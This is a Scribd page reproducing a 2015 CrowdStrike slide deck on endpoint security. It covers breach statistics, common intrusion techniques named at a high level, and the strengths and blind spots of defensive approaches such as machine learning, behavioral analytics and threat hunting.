Scribd
Upload
195 views15 pages

The Next Frontier in Endpoint Security: Dan Larson, Crowdstrike

The document discusses the next frontier in endpoint security and how to stop cyber attacks. It notes that breaches have risen 22% in recent years, with the average dwell time being 146 days and cost per stolen record being $150. Many attacks exploit weak passwords, malware, or abuse legitimate tools. A combination of approaches is needed to effectively block attacks, including machine learning, behavioral analytics, exploit mitigation, sandboxing, detection and response, and threat hunting. Each technique has strengths and limitations, so considering the entire cyber kill chain is important.

Uploaded by

neoalt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
195 views15 pages

The Next Frontier in Endpoint Security: Dan Larson, Crowdstrike

The document discusses the next frontier in endpoint security and how to stop cyber attacks. It notes that breaches have risen 22% in recent years, with the average dwell time being 146 days and cost per stolen record being $150. Many attacks exploit weak passwords, malware, or abuse legitimate tools. A combination of approaches is needed to effectively block attacks, including machine learning, behavioral analytics, exploit mitigation, sandboxing, detection and response, and threat hunting. Each technique has strengths and limitations, so considering the entire cyber kill chain is important.

Uploaded by

neoalt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 15

THE NEXT FRONTIER

IN ENDPOINT SECURITY
DAN LARSON, CROWDSTRIKE

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


BREACHES

22% 146 Day $150


Rise in breaches Average dwell time Cost per stolen record

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


77%
77 percent of U.S. businesses admitted that they
have suffered between one and five separate
incidents of data loss, leakage or exposure in the
past 12 months
HOW ARE THE BAD GUYS GETTING IN?

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


1. Abuse of weak domain user passwords
2. Broadcast name resolution poisoning (like WPAD)
3. Local admin password attacks (pass-the-hash)
4. Attacks on cleartext passwords in memory (Mimikatz)
5. Insufficient network segmentation

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


MAKING MATTERS WORSE

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


ZERO DAYS ARE A LAST RESORT

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


HOW DO WE STOP THE BAD GUYS?

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


 Effective against: New, modified or packed
malware

 Primary benefit: Ani-malware efficacy and


system performance

Machine Learning
 Caution
 Watch out for “learning” period

 Malware is used in less than 50% of attacks

 Blind spots: The rest of the kill chain, and


advanced infection vectors like web shells or
”file-less” malware

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


 Effective against
 Web shells and other advanced infections (e.g. stolen
passwords & abuse of legit tools)
 Ransomware
 Lateral movement

Behavioral Analytics  Persistence


 Data access and exfil

 Primary benefit: Coverage for malware-free attacks


and polymorphic malware
 Caution: Detecting is easier than preventing
 Blind spots: Anything happening pre-execution

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


 Effective against: Exploits - Hugely prevalent exploit
kits

 Primary benefit: System hardening

Exploit Mitigation  Caution: Learning mode, FPs, extracting value

 Blind spots: Insider threat, stolen credentials, abuse


of legitimate tools

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


 Effective against: Exploits - Hugely prevalent exploit
kits

 Primary benefit: Impact reduction

Sandboxing & Isolation  Caution: Now a part of Windows, user impact

 Blind spots: Insider threat, stolen credentials, abuse


of legitimate tools

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


 Effective against: Advanced threats, zero days, APT
activity, insider threat, abuse of legit tools

 Primary benefit: Visibility

Detection & Response  Caution


 Who does the work?
 How “smart” is it?
 Does it scale?
 Do you really want forensics?

 Blind spots: Prevention

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


 Effective against: Advanced threats, zero days, APT
activity, insider threat, abuse of legit tools

 Primary benefit: Visibility, tailored detections

Threat Hunting  Caution


 Do you have the talent for this?
 Hunting vs. MSSP
 Data availability and breadth

 Blind spots: Prevention

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


CLOSING THOUGHTS

THINK ABOUT THE ENTIRE KILL CHAIN

PENETRATION TEST NEW PRODUCTS

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.

You might also like